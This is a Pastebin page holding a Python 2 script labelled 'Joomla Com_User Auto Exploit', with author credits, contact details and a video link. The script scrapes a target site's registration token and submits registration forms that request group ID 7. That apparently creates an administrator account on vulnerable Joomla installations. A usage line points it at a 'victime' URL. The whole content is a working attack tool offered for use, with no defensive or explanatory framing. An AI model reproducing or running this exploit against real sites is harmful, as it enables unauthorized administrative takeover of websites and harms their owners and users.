API tools faq
paste
View difference between Paste ID: DDSSaw0v and 9xNxVenC
SHOW: | | - or go back to the newest paste.
1
Video http://www.youtube.com/watch?v=jg6_MN1wQxI&feature=youtu.be
2
3
#!/usr/bin/python

4
# Joomla Com_User Auto Exploit =D

5
# By Xtroj-EnTn

6
7
import requests as sec4ever, re, urllib, sys, os

8
from threading import Thread 

9
from time import sleep

10
def cls():

11
	os.system(['clear','cls'][os.name =='nt'])

12
13
cls()

14
print '''

15
16
                    Joomla Com_User Auto Exploiter 

17
#Contact Me: Virus-Tn@hotmail.com

18
#Greets: Zisahn Rider - Hatem Dridi  

19
Facebook : https://www.facebook.com/profile.php?id=100007271865841

20
#Coded By: Xtroj-EnTn'''

21
22
pwd2 = 'fio3jfiej9cewc9c9w0eufew9u'

23
def one(target,pwd1,pwd2,email):

24
	# Wrong Password

25
	x1 = xsec.get(target+'/index.php?option=com_users&view=registration')

26
	token = re.findall('type="hidden" name="(.*?)" value="1"', x1.text)

27
	post = {}

28
	post["jform[name]"] = 'Xtroj'

29
	post["jform[username]"] = user

30
	post["jform[password1]"] = pwd1

31
	post["jform[password2]"] = pwd2

32
	post["jform[email1]"] = email

33
	post["jform[email2]"] = email

34
	post["jform[groups][]"] = "7"

35
	post["option"] = "com_users"

36
	post["task"] = "registration.register"

37
	post[token[0]] = "1"

38
	p1 = xsec.post(target+'/index.php?option=com_users&view=registration', data=urllib.urlencode(post))

39
	x2 = xsec.get(target+'/index.php/component/users/?view=registration&layout=complete')

40
41
def exploit(target,pwd1,pwd2,email):

42
	# Wrong Password

43
	x3 = xsec.get(target+'/index.php?option=com_users&view=registration')

44
	token = re.findall('type="hidden" name="(.*?)" value="1"', x3.text)

45
	post = {}

46
	post["jform[name]"] = 'Xtroj'

47
	post["jform[username]"] = user

48
	post["jform[password1]"] = pwd1

49
	post["jform[password2]"] = pwd1

50
	post["jform[email1]"] = email

51
	post["jform[email2]"] = email

52
	post["jform[groups][]"] = "7"

53
	post["option"] = "com_users"

54
	post["task"] = "registration.register"

55
	post[token[0]] = "1"

56
	p2 = xsec.post(target+'/index.php?option=com_users&view=registration', data=urllib.urlencode(post))

57
	x4 = xsec.get(target+'/index.php/component/users/?view=registration&layout=complete')

58
59
xsec = sec4ever.session()

60
if len(sys.argv) == 5:

61
	target = sys.argv[1]

62
	user = sys.argv[2]

63
	pwd1 = sys.argv[3]

64
	email = sys.argv[4]

65
	one(target,pwd1,pwd2,email)

66
	ex = exploit(target,pwd1,pwd2,email)

67
	print '[*] Go To Your Email & Active Then Login :D\nUsername: '+user+' & Password: '+pwd1

68
else:

69
	print "Usage: python tool.py http://www.victime.com/ youruser yourpass yourmail"
        

    


            


                                


        

            



                
    

        Public Pastes
    

    
            

    

                    

        

    





    


    
    
    
    
    
    
    
    




    


    



                

            We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.             OK, I Understand
        

    
                

            

                
                    
                
            

            

                Not a member of Pastebin yet?

                Sign Up, it unlocks many cool features!